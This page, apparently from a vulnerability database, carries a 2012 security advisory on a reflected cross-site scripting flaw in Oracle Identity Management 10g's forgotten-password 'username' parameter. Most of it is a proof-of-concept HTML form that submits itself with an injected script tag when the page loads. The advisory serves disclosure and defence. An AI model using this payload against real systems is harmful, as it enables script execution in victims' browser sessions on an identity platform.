Lucene search
K

Oracle Identity Management 10g Cross Site Scripting

🗓️ 04 Oct 2012 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Oracle Identity Management 10g XSS POST Injection Vulnerability in 'username' paramete

Code
`<!--  
  
Oracle Identity Management 10g (username) XSS POST Injection Vulnerability  
  
  
Vendor: Oracle Corporation  
Product web page: http://www.oracle.com  
Affected version: 10g (10.1.4.0.1)  
  
Summary: Oracle Identity Management enables organizations to effectively  
manage the end-to-end lifecycle of user identities across all enterprise  
resources, both within and beyond the firewall and into the cloud. The  
Oracle Identity Management platform delivers scalable solutions for identity  
governance, access management and directory services. This modern platform  
helps organizations strengthen security, simplify compliance and capture  
business opportunities around mobile and social access.  
  
Desc: Oracle Identity Management suffers from a reflected XSS POST Injection  
vulnerability when parsing user input to the 'username' parameter via POST  
method thru '/usermanagement/forgotpassword/index.jsp' script. Attackers can  
exploit this weakness to execute arbitrary HTML and script code in a user's  
browser session.  
  
Tested on: Oracle Application Server 10g httpd 10.1.2.2.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2012-5110  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php  
  
  
25.09.2012  
  
-->  
  
  
<html>  
<head>  
<title>Oracle Identity Management 10g (username) XSS POST Injection Vulnerability</title>  
</head>  
<body>  
<form  
name="XSS"  
method="POST"  
action="https://192.168.248.132/usermanagement/forgotpassword/index.jsp">  
<input  
type="hidden"  
name="btnSubmit"  
value="SUBMIT" />  
<input  
type="hidden"  
name="username"  
value='"><script>alert(1);</script>' />  
</form>  
<script  
type="text/javascript">  
document.XSS.submit();  
</script>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation